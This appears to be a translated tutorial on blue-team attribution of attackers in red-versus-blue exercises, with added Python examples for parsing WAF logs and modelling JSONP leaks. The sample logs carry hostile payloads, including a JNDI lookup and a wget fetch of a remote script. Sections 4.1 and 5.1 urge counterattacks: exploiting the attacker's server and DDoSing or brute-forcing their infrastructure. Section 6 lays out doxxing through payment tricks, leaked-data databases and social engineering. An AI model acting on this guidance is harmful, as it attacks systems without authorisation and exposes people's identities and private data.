1. Overview
In general, source tracing in attack and defense exercises involves reconstructing the attack chain, tracing the attacker's virtual identity and then real identity, identifying the members of the attacking team, and taking control of the attacker's host.
Generally, the data obtained by the blue team members comes from the following sources:
- Honeypot platforms
- Traffic detection platforms
- WAF, IDS, IPS
- Phishing emails
After obtaining the data information, we need to analyze the data.
Key information to focus on:
- IP address
- DNSLOG, C2 address
- Information in phishing emails
- Hacker ID captured by honeypots
Different devices have different analysis approaches.
2. General Process of Source Tracing
Capture the attack source
- Security device alerts (scanned IP, intrusion events)
- Log traffic analysis
- Abnormal server resources (abnormal files, processes, ports, scheduled tasks, etc.)
- Phishing emails (obtain malicious file samples)
- Honeypot system (obtain attacker behavior)
Source tracing countermeasures
- IP geolocation technology
- ID tracking techniques (search engines, social platforms, etc.)
- Website URLs (WHOIS queries, etc.)
- Malicious samples (extract sample features, username IDs, etc.)
Attacker profiling
- Restore the attack path
- Attack objectives
- What network proxies are used
- Attack methods (web penetration, near-source penetration, social engineering, etc.)
- Obtain attacker's: virtual identity, real identity, contact information, organizational situation, etc.
3. WAF, Traffic Detection Devices
- Request packets -> may contain callback C2 addresses or DNSLOG addresses
- Some websites that allow registration -> obtain the attacker's registered mobile phone number, ID card information, etc.
- IP address -> analyze the path of the attack behavior -> filter out foreign zombie (botnet) IPs
- Pay special attention to attack traffic from cloud servers such as Alibaba Cloud and Tencent Cloud
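The packet and IP review described above, as an added example that is not part of the original post: a small Python script that pulls callback hosts (DNSLOG lookups, download or C2 addresses) out of WAF or reverse-proxy access logs and groups them by source IP, so the IPs worth tracing come first. The log lines, the out-of-band service suffixes (`oob.example`, `dnslog.example`) and the cloud provider CIDR range are constructed placeholders; replace them with the DNSLOG services seen in your alerts and the provider's published address ranges.

```python
"""Pull candidate callback hosts (DNSLOG lookups, download or C2 addresses) out of
WAF / reverse-proxy access logs and group them by source IP.
Added example, not the original post's code.  The log lines, the OOB service
suffixes and the cloud provider CIDR range are constructed placeholders."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in the Nginx "combined" format; not real traffic.
SAMPLE_LOGS = [
    '203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fabc123.oob.example%2Fa%7D HTTP/1.1" 403 0 "-" "curl/8.0"',
    '203.0.113.10 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/;wget%20http://198.51.100.7:8000/x.sh HTTP/1.1" 403 0 "-" "curl/8.0"',
    '192.0.2.44 - - [10/Oct/2023:13:58:40 +0000] "GET /ping?host=127.0.0.1;nslookup%20zz9.oob.example HTTP/1.1" 403 0 "-" "python-requests/2.28"',
    '198.51.100.200 - - [10/Oct/2023:13:57:12 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Placeholder suffixes of out-of-band DNS services; replace with the ones seen in your alerts.
OOB_SUFFIXES = ("oob.example", "dnslog.example")
# Placeholder range standing in for a cloud provider's published address space.
CLOUD_RANGES = {"example-cloud": [ipaddress.ip_network("203.0.113.0/24")]}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# scheme://host[:port] inside the decoded request target (ldap://, http://, ...)
URL_HOST_RE = re.compile(r"[a-z][a-z0-9+.-]*://([^/\s:'\"}\]]+)(?::(\d+))?", re.I)
# bare hostnames under one of the OOB suffixes, e.g. the argument of an nslookup
BARE_HOST_RE = re.compile(
    r"\b((?:[a-z0-9-]+\.)+(?:" + "|".join(re.escape(s) for s in OOB_SUFFIXES) + r"))\b", re.I
)


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def extract_callbacks(target: str) -> set:
    """Hosts in the request target that look like attacker infrastructure: any URL
    whose host is an IP literal, plus hostnames under an OOB suffix."""
    decoded = unquote(target)
    found = set()
    for host, port in URL_HOST_RE.findall(decoded):
        if is_ip_literal(host) or host.lower().endswith(tuple("." + s for s in OOB_SUFFIXES)):
            found.add(f"{host}:{port}" if port else host)
    found.update(BARE_HOST_RE.findall(decoded))
    return found


def cloud_provider(ip: str):
    """Name of the (placeholder) cloud provider whose range contains ip, else None."""
    addr = ipaddress.ip_address(ip)
    for name, nets in CLOUD_RANGES.items():
        if any(addr in net for net in nets):
            return name
    return None


def analyze(lines):
    """Group requests by source IP with request/blocked counts and callback hosts."""
    report = defaultdict(lambda: {"requests": 0, "blocked": 0, "callbacks": set(), "cloud": None})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log record
        entry = report[m["ip"]]
        entry["requests"] += 1
        if m["status"] == "403":  # the WAF blocked this request
            entry["blocked"] += 1
        entry["callbacks"] |= extract_callbacks(m["target"])
        entry["cloud"] = cloud_provider(m["ip"])
    return {ip: dict(e, callbacks=sorted(e["callbacks"])) for ip, e in report.items()}


def prioritize(report):
    """Order source IPs for tracing: those that leaked callback hosts first, then by blocked volume."""
    return sorted(report, key=lambda ip: (len(report[ip]["callbacks"]), report[ip]["blocked"]), reverse=True)


if __name__ == "__main__":
    rep = analyze(SAMPLE_LOGS)
    for ip in prioritize(rep):
        print(ip, rep[ip])
```

The callback hosts are what the threat-intelligence lookups in the next section are run against; the cloud flag marks sources that are likely rented VPS rather than the attacker's own network, which matters for the ticket-to-provider step later in the post.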
4. Threat Intelligence Analysis
After obtaining the attack IP, we can search on threat intelligence analysis platforms to obtain information such as host information, recent activities, and domain name resolution.
Useful websites:
- ThreatBook Online Intelligence Community
- Qihoo 360 Threat Intelligence Center
- 360 Threat Intelligence Center
- VenusEye Threat Intelligence Center
4.1 Host Information
Pay special attention to port information:
- If there is a web application port -> countermeasure (view the port's services, scan ports with masscan or nmap, check vulnerabilities corresponding to the ports)
- CS TeamServer 50050 -> script brute force, DDoS attack (deploy phishing trojans in batches, start hundreds of processes, DDoS the red team's CS end)
4.2 Domain Name Resolution Records
Domain names recently resolved to the IP:
- If any exist -> continue the analysis
- If none exist, and pinging the domain name does not return the attack IP, stop the analysis
.cn domain names:
- Directly obtain the domain name registration information
5. IP & Domain Name Tracing
In some cases, attackers may leave behind the IP or domain name they use, usually for downloading malicious code, reverse proxying, etc. After obtaining the IP or domain name used by the attacker, I usually use the following methods to trace:
5.1 IP
- Through threat intelligence queries, you may obtain the location, ISP, and resolved domain names of the IP.
- Perform a full port scan of the IP using Nmap, scan for vulnerabilities on the ports that provide services, and try to take down the attacking server.
- Use network asset mapping engines to search for the IP used for attack tracing and obtain the services provided by the IP.
- Query precise location data for the IP.
- Launch a DoS attack on the services provided by the IP to prevent further attacks.
- Most attackers use VPS for proxy forwarding or directly launch attacks using VPS. You can submit a ticket to the VPS provider, explaining the attack behavior of the IP. The service provider may prohibit the attack behavior of the IP or ban the attacker's account.
5.2 Domain Name
- Use Whois queries to obtain email addresses and names.
- Check the domain name's ICP filing information with the Ministry of Industry and Information Technology (MIIT).
- Query the historical Whois information of the domain name.
- Search the domain name in search engines, and you may discover the attacker's other account information.
Geolocation query:
Red team attackers may launch attacks using mobile hotspots. We can use geolocation queries to determine their location.
6. Honeypot Tracing
In modern browsers, the same-origin policy is the core of user access security. To allow cross-origin requests, JSONP was born.
In HTML, the `src` attribute of the `script` tag is not subject to the same-origin policy. By using a `script` tag to reference a JavaScript file from another domain, a cross-origin request can be made. This is JSONP.
Honeypots also use this principle to obtain social information.
Obtaining social information through JSONP in honeypots is relatively difficult and generally requires the following two conditions:
- The third-party website allows cross-origin requests and returns sensitive information in the cross-origin response.
- The attacker has logged in to the third-party website and has not logged out.
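The two conditions above, modelled as an added example that is not part of the original post: a toy JSONP profile endpoint of a third-party site, the request a `script` tag on another site causes the browser to send, and the two server-side defences that close the leak (a `SameSite` attribute on the session cookie, and an origin allow-list that fails closed when the `Referer` is missing). The site names `social.example` and `honeypot.example`, the session store and the endpoint functions are constructed for the example; the browser model only decides which cookies and which `Referer` accompany the cross-site load, since the same-origin policy itself does not block it.

```python
"""Model of the JSONP information leak that honeypots rely on, beside the two
defences that close it (SameSite cookies and an origin allow-list).
Added example; site names, session data and endpoints are constructed."""
import json
import re
from dataclasses import dataclass, field
from typing import Optional

SOCIAL_SITE = "social.example"                       # constructed third-party site
SESSIONS = {"sid-123": {"uid": "u1001", "nickname": "alice"}}  # constructed session store
ALLOWED_ORIGINS = {"https://social.example"}         # constructed allow-list for the hardened endpoint
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*$")     # only a bare identifier may be echoed back


@dataclass
class Cookie:
    value: str
    samesite: str = "Lax"   # "Strict", "Lax" or "None"


@dataclass
class Request:
    query: dict
    cookies: dict = field(default_factory=dict)   # name -> value the browser actually sent
    referer: Optional[str] = None


def origin_of(url: str) -> str:
    scheme, rest = url.split("://", 1)
    return f"{scheme}://{rest.split('/', 1)[0]}"


def site_of(url: str) -> str:
    return origin_of(url).split("://", 1)[1]


def browser_script_load(page_url, endpoint_site, callback, jar, referrer_policy="strict-origin-when-cross-origin"):
    """The request a <script src=...> on page_url makes to endpoint_site.  Cross-site,
    the browser attaches only cookies marked SameSite=None, and sends the page's
    origin as Referer unless the tag or page opted out with no-referrer."""
    cross_site = site_of(page_url) != endpoint_site
    sent = {name: c.value for name, c in jar.items() if not cross_site or c.samesite == "None"}
    referer = None if referrer_policy == "no-referrer" else origin_of(page_url)
    return Request(query={"callback": callback}, cookies=sent, referer=referer)


def jsonp_vulnerable(req: Request):
    """Answers any caller that presents a valid session cookie (the leaky pattern)."""
    user = SESSIONS.get(req.cookies.get("session"))
    if user is None:
        return 401, ""
    return 200, f"{req.query.get('callback', 'cb')}({json.dumps(user)});"


def jsonp_hardened(req: Request):
    """Validates the callback name and requires an allow-listed Referer before
    touching the session; a missing Referer is treated as cross-site."""
    cb = req.query.get("callback", "cb")
    if not CALLBACK_RE.match(cb):
        return 400, ""
    if req.referer is None or req.referer not in ALLOWED_ORIGINS:
        return 403, ""
    user = SESSIONS.get(req.cookies.get("session"))
    if user is None:
        return 401, ""
    return 200, f"{cb}({json.dumps(user)});"


def honeypot_page_harvests(endpoint, jar):
    """What a page on honeypot.example learns by loading the endpoint: the visitor's
    nickname if the response carries it, otherwise None."""
    req = browser_script_load("https://honeypot.example", SOCIAL_SITE, "collect", jar)
    status, body = endpoint(req)
    if status != 200:
        return None
    return json.loads(body[len("collect("):-2])["nickname"]


LEAKY_JAR = {"session": Cookie("sid-123", samesite="None")}   # logged in, cookie sent cross-site
LAX_JAR = {"session": Cookie("sid-123", samesite="Lax")}      # logged in, cookie withheld cross-site

if __name__ == "__main__":
    print("vulnerable + SameSite=None:", honeypot_page_harvests(jsonp_vulnerable, LEAKY_JAR))
    print("vulnerable + SameSite=Lax: ", honeypot_page_harvests(jsonp_vulnerable, LAX_JAR))
    print("hardened   + SameSite=None:", honeypot_page_harvests(jsonp_hardened, LEAKY_JAR))
```

Either defence alone is enough to make the honeypot's lookup return nothing: `SameSite=Lax` stops the browser from attaching the session to a cross-site `script` load (condition two), and the allow-list stops the endpoint from answering a foreign page even when the cookie does arrive (condition one). The callback check is unrelated to the leak but belongs on any JSONP endpoint, since an unvalidated callback name lets the response be turned into arbitrary script.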
After obtaining social information through honeypots, the following aspects are generally targeted:
6.1 QQ Number
- If the obtained information is a QQ number, you can try to obtain personal information such as the binding of the QQ number to a bank card by making a large transfer to the QQ number. You can generally obtain one character from the first name or last name.
- Search the QQ number or the email address associated with the QQ number on forums such as Baidu Tieba, and you may obtain Baidu Tieba accounts.
- Use Whois to reverse lookup the QQ email address, and you may obtain the name or domain name.
- Search the QQ number in WeChat, and you may get the attacker's WeChat account.
- Add the QQ number using a secondary account and try to obtain more information through social engineering methods (based on obtaining a large amount of personal information).
6.2 Phone Number
- Transfer money to the account associated with the phone number in Alipay to try to obtain the real user's name corresponding to the phone number.
- Search the phone number in WeChat to try to obtain the WeChat account.
- Search the phone number on DingTalk, and you may obtain part of the real name and work unit.
- Search the phone number on search engines, and you may obtain other account information.
- Check the websites registered with the phone number.
6.3 Tieba Account
- Use Tieba Toolbox to obtain the account's homepage and posted content.
- Check the posted content to see if you can find QQ numbers, phone numbers, email addresses, approximate age, name, etc.
6.4 Social Engineering Databases
In my opinion, social engineering databases are more useful for cross-validation than as a direct way to obtain data. Therefore, the information gathered should be compared against social engineering databases to confirm the real information only after enough of it has been obtained.
6.5 Other Account Information
- Search QQ nickname, WeChat nickname, Alipay nickname, Tieba nickname, etc., and you may obtain information from other platforms, such as Weibo, Zhihu, GitHub, and other forums and SNS communities.
- Check the account's detailed information to extract more useful data, such as name, gender, age, address, work unit, school, etc.
6.6 School
- If you obtain school information and name, you can search the attacker's major information, class, enrollment time, graduation time, student ID, etc. on search engines.
- You can inquire through the school's Tieba, QQ group, etc., to obtain more personal information.
- For master's degree or above, you can search for papers on the China National Knowledge Infrastructure (CNKI) to confirm the research direction.
6.7 Email
- Check the websites registered with the email address.
6.8 Hacker ID Tracing
- Search engines
- Major security response centers (SRCs)
- Community consultations
7. Summary
The results of source tracing are generally as follows:
- Name/ID:
- Attack IP:
- Geolocation:
- QQ:
- IP address owner company:
- IP address associated domain names:
- Email:
- Phone number:
- WeChat/Weibo/SRC/ID proof:
- Profile picture:
- Jump server:
- Associated attack events:
During the source tracing process, social engineering databases are the most important, followed by the aforementioned source tracing analysis approaches.
If there are honeypot devices, try to set them to high interaction.